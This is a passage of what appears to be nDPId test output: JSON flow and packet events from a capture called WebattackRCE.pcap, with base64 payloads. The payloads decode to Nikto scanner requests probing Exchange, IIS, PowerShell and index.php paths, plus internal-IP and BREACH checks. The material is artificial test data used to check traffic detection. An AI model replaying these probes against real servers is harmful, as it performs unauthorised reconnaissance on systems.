+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276787,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1576420276787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276787,"pkt":"AAAAAAAAAAAAAAAACABFAAC5+PtAAEAGQ0F\/AAABfwAAAcIoH5AY5sDVvq1OaYAYAED+rQAAAQEICp1m+1udZvtbR0VUIC9ScGMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276787,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276789,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1576420276789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276789,"pkt":"AAAAAAAAAAAAAAAACABFAADHn6dAAEAGnId\/AAABfwAAAcIqH5DNYaeJfxts9oAYAED+uwAAAQEICp1m+12dZvtdR0VUIC9FV1MvU2VydmljZXMud3NkbCBIVFRQLzEuMA0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCg0K"} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276789,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1576420276790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276790,"pkt":"AAAAAAAAAAAAAAAACABFAAC5NBFAAEAGCCx\/AAABfwAAAcIsH5ClBgwj7e4RBIAYAED+rQAAAQEICp1m+16dZvteR0VUIC9lY3AgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1576420276792,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276792,"pkt":"AAAAAAAAAAAAAAAACABFAAC5lANAAEAGqDl\/AAABfwAAAcIuH5BArawwwOPk6IAYAED+rQAAAQEICp1m+1+dZvtfR0VUIC9PQUIgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276793,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1576420276793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276793,"pkt":"AAAAAAAAAAAAAAAACABFAADD2QRAAEAGYy5\/AAABfwAAAcIwH5DBGuEtmiy9f4AYAED+twAAAQEICp1m+2GdZvthR0VUIC9hc3BuZXRfY2xpZW50IEhUVFAvMS4wDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276793,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1576420276794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276794,"pkt":"AAAAAAAAAAAAAAAACABFAADAoqZAAEAGmY9\/AAABfwAAAcIyH5C3W5qL6yWPx4AYAED+tAAAAQEICp1m+2KdZvtiR0VUIC9Qb3dlclNoZWxsIEhUVFAvMS4wDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KDQo="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7560000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420276796,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1576420276796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"thread_ts_msec":1576420276796,"pkt":"AAAAAAAAAAAAAAAACABFAAC74FpAAEAGW+B\/AAABfwAAAcI0H5AdBth42VHy84AYAED+rwAAAQEICp1m+2SdZvtkR0VUIC4gSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBXZWJMb2dpYyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7560000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420276796,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7560000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420276797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1576420276797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1576420276797,"pkt":"AAAAAAAAAAAAAAAACABFAADj87RAAEAGSF5\/AAABfwAAAcI2H5ABU8uetZ1IA4AYAED+1wAAAQEICp1m+2WdZvtlR0VUIC8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZGVmbGF0ZSwgZ3ppcA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IEJSRUFDSCBUZXN0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7560000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420276797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: BREACH Test)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7560000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1576420276801,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1576420276801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":189,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":189,"pkt_l4_len":155,"thread_ts_msec":1576420276801,"pkt":"AAAAAAAAAAAAAAAACABFAACv4YVAAEAGWsF\/AAABfwAAAcI4H5Af9dm0Z318ZoAYAED+owAAAQEICp1m+2mdZvtpR0VUIC8gSFRUUC8xLjANCk5pa3RvOiAfDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6QFRFU1RJRCkNCg0K"} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7560000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1576420276801,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1576420276803,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276803,"pkt":"AAAAAAAAAAAAAAAACABFAADGlY9AAEAGpqB\/AAABfwAAAcI6H5C5Ma2+n2Qvb4AYAED+ugAAAQEICp1m+2udZvtrR0VUIC9pbmRleC5waHAgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1576420276804,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276804,"pkt":"AAAAAAAAAAAAAAAACABFAADHUClAAEAG7AV\/AAABfwAAAcI8H5AXCWgXkPGhe4AYAED+uwAAAQEICp1m+2ydZvtsR0VUIC9pbmRleC5waHAzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276806,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1576420276806,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276806,"pkt":"AAAAAAAAAAAAAAAACABFAADHuG9AAEAGg79\/AAABfwAAAcI+H5DOCYBdLPnSzYAYAED+uwAAAQEICp1m+26dZvtuR0VUIC9pbmRleC5waHA0IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276806,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 